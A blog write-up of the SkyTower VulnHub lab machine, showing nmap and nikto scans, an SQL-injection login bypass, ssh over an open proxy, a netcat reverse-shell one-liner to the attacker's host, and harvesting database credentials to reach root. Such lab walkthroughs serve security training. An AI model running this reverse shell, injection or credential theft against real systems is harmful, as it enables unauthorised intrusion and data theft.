[Hacking series] – SkyTower

Written by  on July 16, 2015 

Code name: SkyTower

Webpage: https://www.vulnhub.com/entry/skytower-1,96/

VM Download: http://download.vulnhub.com/skytower/SkyTower.zip

Challange: Get root on the system

Just after detecting our victim box in the network, we start scanning the box with nmap

# nmap -Pn -p- -A 192.168.11.5

1

We detected port 80 open, and after browsing to it, we can see a simple login form into it

2

As always, we can try dig deeper with nikto

# nikto -h http://192.168.11.5

3

Nothing special found. The next step will be to test the webapp, as it’s written in php, and we supose that there might be a database behind, we can try to find an sql injection.

4

sqlmap seem to found something interesting

5

Oh.. that failed, well you know what they say: 60% of the time, it works everytime…

But we can still try to find a way to bypass the login!

6-0

Common ways to bypass a php login form are using strings like (‘ # || ” ; ) with boolean expressions that always return true.

 

 

6

Nice, we are in and we got an ssh user:password, lets test it

ssh john@192.168.11.5

7

That did not work, if we remember, as we saw in the nmap scan, ssh port is filtered for some reason.

Time to think out of the box, ssh port is filtered, but the box has got an open proxy running there. We can try to use it with proxychains and see what it happens

8

We can configure proxychains to use our new proxy by editing /etc/proxychains.conf

9

Nice, that worked, but.. we are not it?

10

For some reason the connection gets killed just after our login, but we can solve that with netcat as we still can run commands on the remote box with ssh. We’ll start a netcat listener in our box.

# nc -lvp 8899

Then we’ll run a reverse shell one liner inside the victim box with ssh

# proxychains ssh john@192.168.11.5 nc 192.168.11.12 8899 -e /bin/bash

11

Nice, we are in! What to do now? Gather more information, we saw a webapp before, webapps written in php that work with databases use to store users and passwords in plain text inside .php files

13

And that’s what we got, now we can use this to login into the mysql server and gather more information.

At this point, netcat will not allow us to intercat with the mysql server, we can move to an ssh connection by deleting .bashrc on /home/john/.bashrc and running ssh again (.bashrc contains the code that kills our connection right after the login)

# rm /home/john/.bashrc

Just after doing that, we can get into the mysql server by

$ mysql -u root -p

And using the data we just achieved.

Right after that we can browse into the server for more data

15

Nice, user:password for more accounts found

We can now try to use these accounts to get into the system, and see if we can do sudo to get root.

And after a few attempts…..

16

Game over SkyTower P-)

Category : hacking series

Tags :

Leave a Reply

Your email address will not be published. Required fields are marked *